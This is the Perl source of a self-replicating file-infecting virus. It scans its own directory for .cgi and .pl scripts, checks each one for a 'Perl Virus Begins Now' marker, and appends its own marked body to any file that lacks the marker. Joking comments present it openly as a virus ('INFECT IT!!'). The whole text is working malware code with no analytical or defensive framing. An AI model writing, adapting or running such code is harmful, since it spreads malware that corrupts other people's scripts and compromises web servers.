opendir(DIR, "."); #open the directory this program is in @FILES = readdir(DIR); #get the file names closedir(DIR); ## Look for programs to spread to (limited to the current directory for now) for ($i = 0; $i < @FILES; $i++) { if (substr($FILES[$i], length($FILES[$i]) - 4) eq ".cgi" || substr($FILES[$i], length($FILES[$i]) - 3) eq ".pl") { $TARGETS[$ii] = $FILES[$i]; $ii++; } } for ($i = 0; $i < @TARGETS; $i++) { open(FILE,$TARGETS[$i]); $file = join("",<FILE>); close(FILE); if (index($file, "## Perl Virus Begins Now ##") == -1) { ##the file isn't infected, INFECT IT!! (append to it) if ($me eq "") { #what we want to write hasn't been copied yet, this is a considerate virus, it could just keep copying itself each time and slow your computer down (and become a couple hundred bytes smaller)... open(me,$0); #opens THIS program $me = join("",<me>); $start = index($me,"## Perl Virus Begins Now ##"); $me = substr($me, $start, rindex($me,"## Perl Virus Ends Now##") + 24 - $start); close(me); } open(FILE,">>$TARGETS[$i]"); print FILE $me; close(FILE); } } closedir(DIR);